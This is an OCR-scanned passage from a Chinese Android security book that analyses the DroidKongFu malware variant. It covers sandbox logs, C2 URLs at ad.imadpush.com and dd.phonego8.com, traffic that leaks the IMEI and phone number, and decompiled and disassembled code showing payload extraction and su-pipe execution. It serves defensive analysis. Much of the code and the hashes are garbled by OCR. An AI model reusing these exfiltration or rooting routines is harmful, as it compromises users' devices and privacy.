adpush.com:7500/AppManager/index.php/user/register/register 
Ljava/net/URL;-»«init»(Ljava/lang/String;-http://ad.imadpush.com:7500/App 
Manager/index.php/AppPoster/mgPush/getPush)V 

Ljava/net/URL; -»openConnection()Ljava/net/URLConnection;-org.apache.harmo 
ny.luni.internal.net.www.protocol.http.HttpURLConnectionImpl:http://ad.im 
adpush.com:7500/AppManager/index.php/AppPoster/mgPush/getPush 
Landroid/content/Intent;-»«init»(Landroid/content/Context;-android.app.Re 
ceiverRestrictedContext84055c978 | Ljava/lang/Class;-class 
ad.imadpush.com.poster.AlarmService)V 
Ljava/net/URL;-»«init»(Ljava/lang/String;-http://ad.imadpush.com:7500/App 
Manager/index.php/AppPoster/mgPush/getPush)V 
Ljava/net/URL;-»openConnection()Ljava/net/URLConnection;-org.apache.harmo 
ny.luni.internal.net.www.protocol.http.HttpURLConnectionImpl:http://ad.im 
adpush.com:7500/AppManager/index.php/AppPoster/mgPush/getPush 
Landroid/content/Intent;-»«init»(Landroid/content/Context;-android.app.Re 
ceiverRestrictedContext84055c978 | Ljava/lang/Class;-class 
ad.imadpush.com.poster.AlarmService)V 
Ljava/net/URL;-»«init»(Ljava/lang/String;-http://ad.imadpush.com:7500/App 
Manager/index.php/AppPoster/mgPush/getPush)V 
Ljava/net/URL;-»openConnection()Ljava/net/URLConnection;-org.apache.harmo 
ny.luni.internal.net.www.protocol.http.HttpURLConnectionImpl:http://ad.im 
adpush.com:7500/AppManager/index.php/AppPoster/mgPush/getPush 


从 上 面 的 信息 看 出 ， 该 病毒 执行 了 如 下 的 动作 : 

e 获取 手机 敏感 数据 : 调用 getDeviceId() 获 取 设 备 的 IMEI， 调 用 
getSubscriberId() 获 取 设 备 的 IMSI。 

e 注册 了 广播 接收 者 : ad.imadpush.com.poster.ReceiverAlarmo 


e 启动 了 服务 : ad.imadpush.com.poster.AlarmServiceo 


e 访 问 f 网 站 
http://ad.imadpush.com:7500/AppManager/index.php/user/register/register 

http://ad.imadpush.com:7500/AppManager/index.php/AppPoster/mgPush/ge 
tPush 

笔者 在 浏览 器 中 访问 第 2 个 网 址 ， 打 开 后 的 界面 如 图 12-3 所 示 。 


PHP notice - Mozilla Firefox 


(. PHP notice 


4 imadpush.com "© |J Q A 


TVaTWWWITOIUADPDIIIIGUePIOECLeEUIIOUUTeESTADPDFOSCETCONCUOIUDETSTIOFUSICOUONUOUOUEPDIOPUIS7J 


public function actionUpdatePush() { 
$inei - $ POST ['uid']; 
$sql = "update mg user set ispush-6 where IMEI = " . $imei; 
$result - selectBySql($sql); 
echo $result; 


) 
y 
* 获得 下 发 广告 
u 
public function actionGetPush() ( 
$did - $ POST ['dId']; 
if (isset($dId)) { 
if ($dId -- '654321') ( 
$imei - $ POST ['imei']; 
$res - selectBySql("select * from mg user where IMEI - '" . $imei . "'"); 
$ispush - $res [0] ['ispush']; 
if ($ispush -- 0) ( 
return; 
} E 
// 请 求 广告 
$sql = "select * from mg push where id-68"; 
Stack Trace 
#0 Ivar/www/html/yii/framework/web/actions/CInlineAction.php(50): MgPushController--actionGetPush(| 
#1 Ivar/www/html/yii/framework/web/CController.php(309): CInlineAction-»runWithParams(array()) 


*2 Ivar/www/html/yii/framework/web/filters/CFilterChain.php(134): CController-»runAction(CInlineAction) 
EN zE p-24- 
图 12-3 ”访问 病毒 广告 页 面 


这 段 PHP 代 码 是 请 求 apk 广 告 ， 而 且 还 是 Push 广 告 ， 因 为 缺少 传递 dId 参 
数 ， 造 成 页 面 请 求 错误 并 打印 出 了 栈 跟踪 信息 。 

通过 以 上 收集 到 的 信息 ， 我 们 可 以 初步 判断 该 程序 窃取 用 户 隐 私信 
息 ， 并 且 访 问 广 告 网 站 获取 Push 广 告 程序 。 但 这 些 信息 还 不 足以 理解 病毒 
的 完整 运作 过 程 ， 如 病毒 体 的 释放 、 系 统 目录 的 读 写 等 操作 ， 下 一 小 节 我 
们 将 使 用 DroidBox 来 动态 分 析 它 。 


12.3.2 ”使 用 DroidBox 动 态 分 析 


DroidBox 提 供 了 startemu.sh 与 droidbox.sh 两 个 脚本 程序 ， 前 者 用 于 启动 
一 个 专用 于 Android 动 态 分 析 的 模拟 器 实例 ， 后 者 用 于 执行 具体 的 apk 动 态 分 
析 。 
首先 创建 一 个 AVD， 笔 者 在 此 直接 使 用 了 上 一 小 节 的 模拟 器 (名 称 为 
android2.3.3) 。 然 后 在 终端 提示 符 下 执行 以 下 命令 启动 DroidBox 分 析 环 
境 : 
./startemu.sh android2.3.3 
启动 完成 后 执行 以 下 命令 开始 动态 分 析 病 毒 样本 : 
./droidbox.sh ./virus.apk 
droidbox.sh 脚 本 只 有 一 个 参数 ， 那 就 是 apk 文 件 名 。 命 令 执 行 后 会 进入 
DroidBox 运 行 界 面 ， 如 图 12-4 所 示 ，DroidBox 会 自动 收集 中 间 运 行 结果 ， 这 
个 过 程 可 能 很 慢 ， 读 者 可 以 在 模拟 器 中 点 击 病 毒 程 序 图 标 来 让 DroidBox 快 
速 收集 更 多 信息 。 


feicong(bfeicong-ubuntu12: -/tools/DroidBox23 


CERA m AU 
CUM AM VAN ew 

OY dO Lr Yt E UN ems /NN 
VU A TTL A RN LR </ 
\ fo: 


本 人 二 eo, 生计 | 
WAS AAA NINI 
[/] Collected 29 sandbox logs (Ctrl-C to view logs) 


图 12-4 ”DroidBox 运 行 界面 
等 到 “Collected xx sandbox logs” 信 息 显示 的 数值 长 时 间 不 发 生变 化 时 ， 
按 下 CTRL+C 结 束 DroidBox 的 运行 。 此 时 DroidBox 会 输出 所 有 采集 到 的 信 
息 ， 笔 者 在 此 列 出 部 分 信息 如 下 : 


File name: ./virus.apk 


MD5: 
SHA1: 


SHA256: 


Duration: 


45£86e5027495dc33d168£4£4704779c 
6564c212e42c61c7c0e622abb96d1fd0f7980014 
dc8ca477283c41ff8d4a2bb318f3a9aea426767c8c1e44b 
db725ef5e630b65345 


[File activities] 


[10. 


6619420052] 


16.534528017s 


Path: 


shared prefs/jmuser.xml 


s.s.s. 


[14.5037009716] 


.0767269135] 
.6161949635] 
.3806829453] 
.7169969082] 
.9263288975] 
[30. 
[51. 
[64. 
[95. 


7892029285] 
8003950119] 
9976928234] 
2044019699] 


[125.576211929] 
[155.782448053] 
[185.996846914] 
[216.208056927] 
[246.440768957] 
[276.686179876] 


[Outgoing traffic] 


Path: 


/data/data/com.tebs3.cuttherope/ 


/data/data/com.tebs3.cuttherope/lib/ 


tmp-622898097tmp 


Destination: 
Destination: 
Destination: 
Destination: 
Destination: 
Destination: 
Destination: 
Destination: 
Destination: 
Destination: 
Destination: 
Destination: 
Destination: 
Destination: 
Destination: 


180.210.34.207 Port: 7500 
180.210.34.207 Port: 7500 
221.130.177.7 Port: 80 
221.130.177.7 Port: 80 
ad.imadpush.com Port: 7500 
58.221.44.102 Port: 7500 
localhost Port: 123 
221.130.177.7 Port: 80 


221.130.177.7 Port: 80 
221.130.177.7 Port: 80 
221.130.177.7 Port: 80 
221.130.177.7 Port: $0 
221.130.177. Port: 80 
221.130.177.7 Port: 80 
221.130.177.7 Port: 80 


[11.3436820507] Destination: 180.210.34.207 Port: 7500 
Data: GET /ad/nadp.php?v-1.5&id-all HTTP/1.1 
Host: dd.phonego8.com:7500 
Connection: Keep-Alive 
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) 


[12.2810199261] Destination: 221.130.177.8 Port: 80 
Data: GET /mst.htm?version-2.3.6 HTTP/1.1 
Connection: Close 
Host: amob.acs86.com 


[Incoming traffic] 


[11.4650139809] Source: 180.210.34.207 Port: 7500 
Data: HTTP/1.1 200 OK 


[11.9140660763] Source: 180.210.34.207 Port: 7500 
Data: HTTP/1.1 200 OK 


[DexClassLoader] 


10.8419530392 Class: com.airpuh.ad.UpdateCheck 
11.0423948765 Class:ad.imadpush.com.poster.AlarmService 
11.0516819954 Class:ad.imadpush.com.poster.AlarmService 


[Enforced permissions] 


[11.7492880821] Sink: Network 
Destination: 180.210.34.207 
Port: 7500 
Tag: TAINT IMEI 
Data: GET /ad/nadp.php?v-1.5&id-CHNF&u-357242043237517 
HTTP/1.1 Host: dd.phonego8.com:7500 Connection: Keep-Alive 


[12.9422860146] Sink: Network 
Destination: 221.130.177.8 
Port: 80 


Tag: TAINT PHONE NUMBER, TAINT IMEI 
Data: GET /a.htm?:':* 


[31.5355570316] Sink: Network 
Destination: 58.221.44.102 
Port: 7500 


Tag: TAINT IMEI 
Data: POST /AppManager/index.php/user/register/register 
HTTP/1.1 Content-Length: 136 Content-Type: application/ 
x-www-form-urlencoded Host: ad.imadpush.com:7500 Connection: 
Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE 
(java 1.4) imei=357242043237517&packagename=com.tebs3. 
cuttherope&versionname-1.1.5&versioncode-6&IMEI- 
357242043237517&login way-1&user detal info-1 


[Sent SMS] 


Saved APK behavior graph as: behaviorgraph.png 


Saved treemap graph as: tree.png 


DroidBox 的 输出 结果 比 APIMonitor 要 详细 得 多 。 首 先是 文件 操作 部 
分 ，DroidBox 监 控 到 了 病毒 向 程序 shared_prefs 目 录 下 写 入 了 jmuserxml 文 
件 ， 并 向 lib 目 录 下 写 入 tmp-622898097tmp 文 件 。 后 者 根据 经 验 可 以 初步 判 
断 是 一 个 随机 生成 的 文件 名 。 


在 网 络 连接 报告 中 显示 程序 连接 了 以 下 3 个 IP 地 址 : 
180.210.34.207: 7500 
221.130.177.7: 80 


ad.imadpush.com (58.221.44.102) : 7500 


输出 通信 (Outgoing traffic) 显示 连接 了 180.210.34.207 与 221.130.177.8 
两 个 IP 地 址 。 

输入 通信 (Incoming traffic) 显示 连接 了 180.210.34.207。 

DroidBox 未 检测 到 广播 接收 者 。 但 检测 到 启动 的 服务 中 ， 除 了 
AlarmService 外 ， 还 多 了 APIMonitor 漏 掉 的 com.airpuh.ad.UpdateCheck。 

最 后 是 信息 泄露 (Information leakage) ，DroidBox 综 合 收 集 到 的 信 
息 ， 发 现 了 三 处 信息 泄露 。 信 息 的 接收 端 (Sink) 均 来 自 网 络 。 泄 漏 的 内 容 
为 每 条 信息 的 Tag 标 记 : TAINT PHONE NUMBER (手机 号 码 ) 、 
TAINT IMEI (手机 IMEI) 。 从 最 后 一 条 信息 泄露 的 内 容 来 看 ， 程 序 除 了 发 
送 手 机 的 IMEI 外 ， 还 发 送 了 程序 包 名 (packageame) 、 版 本 号 

(versionname) 、 版 本 代码 (versioncode) 。 

言 息 报 告 完 后 会 自动 生成 behaviorgraph.png 与 tree.png 两 个 图 像 文 件 ， 两 

者 分 别 采 用 时 序 图 与 树 图 的 方式 显示 了 DroidBox 记 录 的 所 有 操作 。 


12.3.3 ”其 它 动 态 分 析 工 具 


DroidBox 虽 然 功 能 强大 ， 但 如 果 只 是 偶尔 分 析 一 下 程序 ， 下 载 安装 如 
此 大 的 工具 就 显得 太 耗 费时 间 了 。 笔 者 在 此 介绍 一 款 Android 程 序 在 线 动态 
分 析 工 具 Mobile Sandbox. (手机 沙 盒 ， 沙 盒 是 一 个 程序 虚拟 运行 环境 ， 
DroidBox 就 是 采用 的 这 种 技术 ) ， 该 工具 本 来 是 MobWorm 项 目的 一 部 分 ， 
现在 被 提取 出 来 专门 用 于 在 线 Android 软 件 的 静态 与 动态 分 析 ， 目 前 该 工具 
由 德 技 术 人 m Michael Spreitzenbarth 维护 ， 网 址 为 
http://mobilesandbox.org/， 打 开 网 站 界面 如 图 12-5 所 示 。 


Mobile-Sandbox - Mozilla Firefox 


£5 Mobile-Sandbox 


€ | mobilesandbox.org 


Mobile Sandbox Home Repor 


LT MS 


MOBILE SANDBOX 


Browse... 


Submit Sample File Sample |/mnt/shared/Temp/Android KungFu variant com.tebs3.cuttherope 6 


ndoid applicalio: file 
ipk-file) and the Mobile-Sandbox Analysis Options ”图 Others can view this report 


Delete sample after analysis (Note: You must provide an email address) 


Email Noti'ication 


Send File Cancel 


图 12-5 EW 


点 击 页 面 上 的 Browse 按 钮 选择 要 分 析 的 apk 文 件 ， 然 后 点 击 Send File E 
传 文件 ， 上 传 完成 后 页 面 会 显示 apk 文 件 的 MD5 值 ， 等 待 一 段 时 间 (程序 较 
小 的 话 大 概 半 分 钟 就 够 了 ) 后 ， 在 页 面 右上 角 的 Search 文 本 框 中 输入 文件 的 
MD5 值 后 按 回 车 键 搜索 在 线 分 析 的 结果 (本 实例 样本 程序 的 MD5 值 为 : 
45f86e5027495dc33d168f4f4704779c) ， 如 果 搜 索 到 的 信息 显示 分 析 状 态 为 
Done， 则 说 明 分 析 完 成 了 ， 效 果 如 图 12-6 所 示 。 


Mobile-Sandbox - Mozilla Firefox 


C Mobile-Sandbox 


> = mobilesandbox.org QN Q e^ 


Mobile Sandbox 


e MS 


MOBILE SANDBOX 


Results: Name 


图 12-6 ”样本 已 经 分 析 完 成 


点 击 页 面 上 的 apk 文 件 名 查看 分 析 结 果 。 在 结果 页 面 可 以 发 现 有 static 
analyzer 与 dynamic analyzer 两 种 分 析 报 告 。static analyzer 为 静态 分 析 ， 这 种 
分 析 结 果 提 供 了 apk 文 件 使 用 到 的 组 件 、 权 限 、 方 法 调用 等 信息 ， 这 些 信息 
通过 反 编 译 apk 文 件 可 以 直接 看 到 ; dynamic analyzer 为 动态 分 析 ， 采 集 信息 
的 原理 与 DroidBox 类 似 ， 报 告 的 结果 也 大 同 小 异 。 点 击 页 面 上 的 dynamic 
analyzer V1 链接 打开 动态 分 析 报 告 页 面 ， 如 图 12-7 所 示 ，Mobile Sandbox 报 
告 的 分 析 结 果 与 DroidBox 相 差 无 几 。 


Mobile-Sandbox - Mozilla Firefox 


12 Mobile-Sandbox 


图 12-7 Mobile Sandbox 动 态 分 析 结 果 


除了 报告 静态 分 析 与 动态 分 析 结果 外 ，Mobile Sandbox 还 对 部 分 程序 报 
告 以 下 内 容 : 

e APKInfo: apk 文 件 的 包 名 与 压缩 包 中 所 有 文件 的 层次 结构 。 

e Screenshots: 程序 运行 界面 截图 。 

e PCAP Analysis: PCAP 网 络 数据 包 分 析 。 内 容 比 DroidBox 还 详细 。 

e ltrace Output: 报告 原生 函数 库 的 调用 情况 。 


12.4 ”病毒 代码 逆向 分 析 


通过 前 面 的 分 析 ， 我 们 已 经 初步 掌握 了 病毒 调用 的 系统 敏感 API 以 及 泄 
息 。 从 本 节 开 始 ， 我 们 将 采用 静态 分 析 的 方法 来 对 病毒 的 关键 代码 
逐 行 的 分 析 。DroidKongFu 通 过 Java 层 的 Native 国 数 来 启动 病毒 外 壳 ， 


然后 由 病毒 外 壳 来 启动 真正 的 病毒 主体 ， 本 节 主 要 从 Java 层 、Native 启 动 
层 、Native 核 心 层 等 三 个 方面 来 着 手 对 DroidKongFu 变 种 病毒 进行 分 析 。 


12.4.1 ”Java 层 启动 代码 分 析 


首先 反 编译 样 本 程序 virus.apk。 在 终端 提示 符 下 依次 执行 以 下 命令 : 
apktool d ./virus.apk 


dex2jar.sh ./virus.apk 


反 编 译 完 成 后 打开 virus 目 录 下 的 AndroidManifest.xml 文 件 ， 可 得 到 如 下 


e 程序 包 名 为 com.tebs3.cuttherope， 版 本 1.1.5。 

° f 序 有 2 个 Activity : MainActivity 5 
ad.imadpush.com.poster.PosterInfoActivity， 其 中 前 者 为 主 Activity。 

e 程序 有 两 个 元 数据 : MYAD_PID 与 ad.imadpush.com， 取 值 分别 为 


NCuttherope 与 100001。 

e 程序 有 2 个 Service :  comaairpuh.ad.UpdateCheck 与 
ad.imadpush.com.poster. AlarmServicec 

e E F 有 1 ^^ | BroadcastReceiver 


ad.imadpush.com.poster. ReceiverAlarmo 
e 程序 使 用 到 以 下 权限 : 
«uses-permission android:name="android.permission.INTERNET"/> 
«uses-permission android:name-"android.permission.ACCESS NETWORK STATE"/» 
«uses-permission android:name-"android.permission.ACCESS WIFI STATE"/-» 
«uses-permission android:name-"android.permission.READ PHONE STATE"/- 


«uses-permissionandroid:name-"android.permission.ACCESS COARSE LOCATION" /> 
执行 命令 “jd-gui ./virus_dex2jar.jar” 使 用 jd-gui 打 开 和 转换 成 功 的 jar 文 件 ， 
定位 到 MainActivity 类 的 OnCreate() 方 法 处 ， 如 图 12-8 所 示 。 


Java Decompiler - MainActivity.class 


€ age 


virus dex2jarjar 四 = 
> Di MainActivity.class (x - 
b Ùm 
P [Dn public void onCreate(Bundle paramBundle) 
> BB util { 
v Bi com super .onCreate(paramBundle); 
setContentView(2130003048); 
v BB airpuh.ad if (lisPhoneRooted(this)) 
> [D UpdateCheck$1 { 
bp [D] UpdateCheck Toast.makeText(getApplicationContext(), "Device not rooted? Please refund this app - root is require 
" this. root - false; 
En izp.views ) 
ME this. unlockButton = ((Button)findViewById(2131034113)); 
> H battery this. unlockButton.setÜnClickListener(new MainActivity.1(this)); 
v BB cuttherope this. startButton - ((Button)findViewById(2131034114)); 
MainActivity$1 this. startButton.setÜnClickListener(new MainActivity.2(this)); 


((ImageView)findViewById(2131034116)) .setOnClickListener(new MainActivity.S(this)); 
this .mAd2 = new NewAd(this); z e 
sea S 启动 广告 接收 线程 


MainActivity$2 


n mag d A 

new f(this); 

R ntent Localintent = new Intent(); 
localintent.setClass(this, UpdateCheck. class );| 


> p 
> [J 
> [J| MainActivity$3 
* p 
> [p 


> Da 
: startService(locallntent); 
> [Jaa 
> [D ab } 
~ D 


12-8 MainActivity 的 OnCreate() 方 法 


病毒 在 MainActivity 初 始 化 时 ， 做 了 以 下 三 件 事 。 

1. 启动 广告 接收 线程 

程序 在 OnCreate() 方 法 中 启动 了 一 个 线程 循环 的 接收 广告 。 启 动 线程 的 
代码 为 : 

this.mAd2 = new NewAd(this); 

this.mAd2.startAd(); 

NewAd 从 名 称 上 就 可 以 判断 是 与 AD (广告 ) 相关 的 类 ， 第 一 行 代码 实 
例 化 了 一 个 NewAd 对 象 ， 第 二 行 代 码 调用 了 它 的 startAd0 方 法 。NewAd 类 的 
构造 函数 初始 化 了 一 些 对 象 ， 这 里 我 们 不 去 深究 ， 主 要 碍 看 其 startAd() 方 
法 ， 代 码 如 下 : 


public void startAd() 


( 
new g(this).start(); 


startAd() 新 建 了 一 个 g 对 象 并 调用 了 它 的 start() 方 法 。 点 击 字 和 母 g 的 链接 
跟踪 g 类 的 代码 ， 发 现 它 继承 自 Thread， 原 来 是 一 个 线程 类 。 有 过 Android 软 
件 开发 经 验 的 读者 应 该 都 知道 ，Thread 对 象 的 start0 方 法 执行 的 是 它 的 run() 
方法 ， 我 们 继续 查看 其 run() 方 法 ， 代 码 如 下 : 


public void run() 
{ 


while (true) 


if (NewAd.a(this.a)) / /调用 NewAd 类 的 静态 方法 a () 
return; 
NewAd.b(this.a); // 调 用 Newad 类 的 静态 方法 b () 
try 
( 
sleep(5000L); / / X FéBEB S E, 


} 
catch (InterruptedException localInterruptedException) 
( 
) 
) 
) 


这 是 一 段 循 环 代 码 ， 主 要 调用 了 NewAd 类 的 a0) 方 法 与 b0 方 法 ， 这 两 个 
方法 都 是 虚构 合成 (static synthetic) 的 ， 在 jd-gui 中 找 不 到 它们 的 声明 ， 使 
用 gedit 编 辑 器 打开 反 编译 出 的 NewAd.smali 文 件 ， 发 现 其 声明 代码 如 下 : 


.method static Synthetic a(lLcom/tebs3/battery/NewAd;)zZ 
.locals 1 


iget-boolean v0, p0, Lcom/tebs3/battery/NewAd;-»a:Z 
return v0 
.end method 


.method static synthetic b(Lcom/tebs3/battery/NewAd;)V 
.locals 0 


invoke-direct {p0}, Lcom/tebs3/battery/NewAd;--a()V 
return-void 
.end method 


al() 方 法 实质 是 访问 NewAd 类 的 a 成 员 ， 该 变量 是 boolean 类 型 ， 初 始 化 时 
值 为 false， 因 此 循环 第 一 次 执行 时 第 一 个 if 语 句 不 会 返回 。b() 方 法 实质 是 调 
用 NewAd 类 的 a) 方法 ， 它 的 主要 工作 是 访问 网 址 
http://dd.phonego8.com:7500/ad/nadp.php?v=1.5&id=all 并 解析 返回 的 结果 ， 
根据 不 同 的 结果 调用 不 同 的 方法 ， 并 设置 成 员 a 的 值 为 tue。 其 实 它 的 功能 
就 是 请 求 不 同 广告 商 的 Push 广 告 ， 具 体 的 代码 限于 篇 幅 此 处 不 再 展开 。 

2. 启动 全 局 定时 器 

启动 全 局 定时 器 的 代码 只 有 以 下 一 行 : 

new f(this); 

f 类 在 初始 化 时 执行 了 两 个 方法 ， 前 者 的 代码 为 : 

public void a(Activity paramActivity, boolean paramBoolean) 

1.a = paramBoolean; 

a = paramactivity; 
this.g = m.b(paramActivity); 


d - paramActivity.getSharedPreferences("jmuser", 0); // 读 取 


SharedPreference 文 件 


d.edit().putLong("dId", this.g.longValue()).commit(); // 写 入 dId 的 值 
c localc = new c(this); /7 实例 化 一 个 c 对 象 ， 继 承 目 AsyncTask 
Object [] arrayOfObject = new Object[3]; 

arrayOfObject[0] = null; 

arrayOfObject[1] = Integer.valueOf(0); 

arrayOfObject[2] = null; 


localc.execute(arrayOfObject); // 执 行 异 步 操作 
) 


这 个 方法 主要 的 作用 是 获取 did 与 userId 两 个 键 值 ， 然 后 通过 
SharedPreference (R f£ 到 jmusexml X 件 中 (文件 位 
T /data/data/com.tebs3.cuttherope/shared prefs El R ) , dId B9 (É XR Je F 
AndroidManifest.xml P BS 75 ZX dg ad.imadpush.com , "E B f& [8] XE 73 100001 , 
userid 的 值 是 c 对 象 来 设置 的 ， 上 有 具体 是 通过 访问 网 址 
http://ad.imadpush.com:7500/AppManager/index.php/user/register/register 来 获 
取 。 这 个 userId 用 来 标识 一 个 “合法 ”的 用 户 ， 每 个 感染 了 该 病毒 的 手机 通过 
这 个 userId 来 获取 Push 广 告 。 


f 类 初始 化 时 执行 的 另 一 个 方法 为 静态 方法 b()， 它 的 代码 如 下 : 


private static void b() 


( 


) 


Intent localIntent = new Intent(a, ReceiverAlarm.class);  // 打 算 启动 
ReceiverAlarm 

e - PendingIntent.getBroadcast(a, 0, localIntent, 0); / /构造 一 个 
PendingIntentJ]$ 


Calendar localCalendar = Calendar.getInstance(); 
localCalendar.setTimeInMillis(System.currentTimeMillis()); 

Date localDate - new Date(localCalendar.getTimeInMillis()); 

l.a(new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(localDate)); 


c - (AlarmManager)a.getSystemService("alarm"); / /获取 系统 定时 服务 
c.setRepeating(0, localCalendar.getTimeInMillis(), 360000L, e); 
/ /启动 定时 器 


b0) 方 法 启动 了 一 个 全 局 定时 器 ， 对 象 为 ReceiverAlarm， 周 期 为 360000 
毫秒 。 ReceiverAlarm 的 OnReceive() 方 法 只 有 一 行 代码 : 

paramContext.startService(new Intent(paramContext, AlarmService.class)); 

这 行 代码 只 是 启动 了 AlarmService 服 务 ， 我 们 再 来 看 看 AlarmService 服 
务 的 OnStart() 方 法 代码 : 


public void onStart(Intent paramIntent, int paramInt) 


{ 


super.onStart(paramIntent, paramInt); 

this.d s f.a- 

this.e - Long.valueOf(f.d.getLong("userId", 0L)); 
this.g = Long.valueOf(f.d.getLong("dId", 0L)); 
a(; // 该 方法 获取 系统 通知 服务 

g localg = new g(this); // AsyncTask 对 象 

Object[] arrayOfObject = new Object[3]; 
arrayOfObject[0] 
arrayOfObject[1] 
arrayOfObject[2] 
localg.execute(arrayOfObject); // 发 送 通知 


null; 


Integer.valueOf (0); 


null; 


服务 启动 时 获取 了 系统 的 通知 服务 ， 然 后 调用 AsyncTask 的 execute 来 向 
用 户 发 送 通 知 ， 诱 骗 用 户 安装 广告 软件 。 

3. 启动 恶意 服务 

OnCreate() 方 法 最 后 通过 以 下 3 行 代码 启动 了 一 个 恶意 的 服务 。 

Intent locallntent = new Intent(); 

localIntent.setClass(this, UpdateCheck.class); 

startService(localIntent); 


启动 的 服务 名 称 为 UpdateCheck， 病 毒 的 主体 就 是 通过 它 来 启动 的 。 下 
面 我 们 来 看 看 该 服务 的 代码 ， 首 先是 如 下 语句 : 
static 
{ 
System.loadLibrary("vadgo"); 
} 


UpdateCheck 服 务 加 载 了 一 个 原生 动态 链接 库 vadgo。 然 后 是 OnCreate() 
方法 ， 它 的 代码 如 下 : 


public void onCreate() 
( 
super.onCreate(); 
try 
( 
Object localObject - getPackageManager().getApplicationInfo 


(getPackageName(), 128).metaData.get("MYAD PID");  // 获 取 元 数据 MYAD_PID 
if (localObject != null) 
this.mCh - ((String)localObject); 
this.mId = ((TelephonyManager)getSystemService ("phone")) .getDeviceId(); 
/ /获取 IMEI 
if (this.mId -- null) 


this.mId - Settings.System.getString(getContentResolver(), 


"android id"); 


this.mPkg = getPackageName(); // 获 取 程 序 包 名 
new UpdateCheck.1(this).start(); // 月 动 Updatecheck .1 线程 
return; 


) 
catch (Exception localException) 
( 

while (true) 


localException.printStackTrace(); 


) 

onCreate() 方 法 中 设置 了 mCh、mId、mPkg 共 3 个 成 员 变 量 ， 它 们 的 值 分 
别 是 元 数据 MYAD_PID (AndroidManifest.xml 中 值 为 NCuttherope) 、 设 备 
ID、 程 序 包 和 名。 然后 启动 了 UpdateCheck.1 线 程 ， 该 线程 的 run() 方 法 只 


行 代码 : 
this.this$0.DataInit(UpdateCheck.accessS1l(this.this$0), / /mId 
UpdateCheck.access$2(this.this$0), // mCh 
UpdateCheck.access$0(this.this$0)); // mPkg 


DataInit() 方 法 定义 在 UpdateCheck 类 中 ， 它 是 一 个 Native 方 法 ， 有 3 个 
String 类 型 的 参数 。 代 码 中 传递 的 值 分 别 为 mId、mCh、mPkg (access$ 类 型 
的 方法 在 jd-gui 中 无 法 查看 ， 同 样 需要 在 smali 文 件 中 查找 相应 的 方法 代 
码 ) 。 

当 DataInit() 方 法 执行 完毕 ， 病 毒 主体 就 算 真 正 激活 了 。 也 就 是 从 这 里 
开始 ， 病 毒 的 代码 从 Java 层 进入 到 了 Native 层 ， 我 们 将 在 下 一 小 节 继 续 分 
析 。 


12.4. ”Native 层 启动 代码 分 析 


Java Æ 的 Datalnit() 7; 法 对 应 Naive 层 的 
Java com airpuh ad UpdateCheck Datalnit() 图 数 ， 后 者 的 实现 代码 位 于 
libvadgo.so 文 件 中 ， 将 该 文件 拖 入 IDA Pro 窗 口中 ， 定 位 到 DataInitO 国 数 的 
起 始 代码 处 以 便 开 始 分 析 。DataInitO 孙 数 主要 完成 功能 字符 串 解密 、 释 放 
病毒 主体 、 开 启 su 权限 管道 、 执 行 病 毒 主 体 等 几 项 工作 。 整 体 代码 框架 如 
qs 


.text: 
tert 
.text: 
.text: 
. text: 
.téxt: 
.text: 
Jte: 
.text: 
text: 
.text: 
„text: 
.text: 
text: 
.text: 
COXE: 
¿text: 
.text: 
.text: 
.text: 
.text: 


0000093C 
0000093C 
0000093C 
0000093C 
0000093C 
0000093C 
0000093C 
0000093E 
00000940 
00000942 
00000944 
00000946 
00000948 
0000094A 
0000094C 
0000094E 
00000950 
00000952 
00000954 
00000956 
00000958 


guard ptr 


.text: 
text: 
:00000960 
:00000962 
:00000964 


0000095A 
0000095E 


:00000994 
:00000996 
:00000998 
:00000998 
:00000998 
:0000099C 
:0000099E 
:000009A0 


Java com airpuh ad UpdateCheck DataInit 


PUSH 


loc 998 
BL 
MOV 
CMP 
BNE 


(RA-R7,LR) ; 将 R4-R7 寄 存 器 以 及 LR 寄 存 器 的 值 压 入 堆栈 
; RO-JNIEnv* 
; R1-Jobject 
; R22mId (Androiditf&ID) 
; R32mCh (META DATA = NCuttherope) 
; [SP] =mPkg (程序 包 名 = "com.tebs3.cuttherope") 
R7, R11 ; 以 下 4 行 保存 寄存 器 R8-R11 
R6, R10 
R5, R9 
RA, R8 
(RA4-R7) ; 将 R8-R11 寄 存 器 的 值 压 入 堆栈 
RA, zOxFFFFFDEA ; -0x21c 
R7, R3 ; "NCuttherope" 
R3, -0x5C ; 相对 GoT 表 的 偏 移 
SP，R4 ; 开辟 栈 空间 
R4, =(_GLOBAL_OFFSET_TABLE_ - 0x95A) ;数据 存 取 的 基 址 
R9, R3 
R1, [SP,#0x240] ; 第 5 个 参数 ,也 就 是 原 [SP] = 程序 包 名 
RA, PC 
R3, [RA4,R3] ; 0x10c8+0x5c = 0x1124 = stack chk. 
R6, JNINativeInterface.GetStringUTFChars 
R3, [R3] ; . stack chk guardl[ffi 
R8, R1 
Rl, R2 ; Android ff ID 
R3, [SP,#0x214] ; 保存 R3 寄 存 器 ， 用 于 堆栈 完整 性 检查 
loc 998 ; 字符 串 解密 
goreturn 


; CODE XREF: .text:000009941j 


init predata  ; 字符 串 解 密 


R2, R10 ; 判断 Java 代 码 传递 过 来 的 METRA DRATR 是 否 为 空 
R2, #0 
extractelf 


.text:000009A2 B SetR10 ; 如 果 R10 为 0 则 设置 R10 为 “self” 字 符 串 地 址 
.text:000009A4 


.text:000009A4 extractelf ; 释放 病毒 主体 

.text:00000A14 accesssu ; 检查 su 程序 的 路 径 

.text:00000A26 popensu ; 开启 su 权限 的 管道 

.text:00000A38 runcommand ; 执行 病毒 主体 

.text:00000B1C goreturn ; CODE XREF: .text:000009961j 

.text:00000B1C ; .text:00000B42FLj 

.text:00000B1C MOV R2, R9 ; 读 取 原先 保存 的 R3 寄 存 器 的 值 

.text:00000B1E LDR R3, [R4,R2] ; WHUg^6 stack chk guard  ptrll'] fi 

.text:00000B20 LDR R2, [SP,40x214]; 恢复 保存 的 寄存 器 R3 的 值 到 寄存 器 R2 中 

.text:00000B22 LDR R3, [R3] ; 读 取 原 先 __stack_chk_guard 的 值 

.text:00000B24 CMP R2, R3 ; 判断 堆栈 上 __stack_chk_guard 的 值 是 否 
变化 

.text:00000B26 BNE checkstackfail ; 堆栈 检查 失败 

.text:00000B28 MOVS R3, 0x21C ; 以 下 为 恢复 寄存 器 

.text:00000B2C ADD SP，R3 

.text:00000B2E POP (R2-R5) ;将 R8~R11 寄 存 器 的 值 弹 到 R2~R5 寄 存 器 中 

